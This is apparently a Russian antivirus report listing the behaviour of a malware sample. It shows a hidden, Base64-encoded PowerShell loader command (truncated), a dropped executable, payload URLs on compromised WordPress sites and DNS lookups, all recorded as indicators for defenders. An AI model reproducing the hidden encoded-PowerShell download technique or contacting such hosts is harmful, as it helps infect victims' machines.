Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABUAHEAcABrAGUAdgB1AGUAcQBuAHQAcwB4AD0AJwBIAHcAZAB1AG8AYwB4AHQAbwAnADsAJABLAHcAcgBhAHUAbgBpAHEAcwBlAHYAcQBoACAAPQAgACcANAAxADYAJwA7ACQAQQBhAGQAegBqAHUAbABkAHIAPQAnAFAAZABxAHMAYgB...
- %HOMEPATH%\416.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\416.exe
- %HOMEPATH%\416.exe
- http://ki########kyuzrehabilitasyon.com/wp-includes/69n2/
- http://si######p.cindydonovan.com/wp-admin/81ynglg/
- DNS ASK ki########kyuzrehabilitasyon.com
- DNS ASK si######p.cindydonovan.com
- DNS ASK ja###events.com
- DNS ASK sh#####hviviettel.com
- DNS ASK ma####lgroup.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABUAHEAcABrAGUAdgB1AGUAcQBuAHQAcwB4AD0AJwBIAHcAZAB1AG8AYwB4AHQAbwAnADsAJABLAHcAcgBhAHUAbgBpAHEAcwBlAHYAcQBoACAAPQAgACcANAAxADYAJwA7ACQAQQBhAGQAegBqAHUAbABkAHIAPQAnAFAAZABxAHMAYgB...' (со скрытым окном)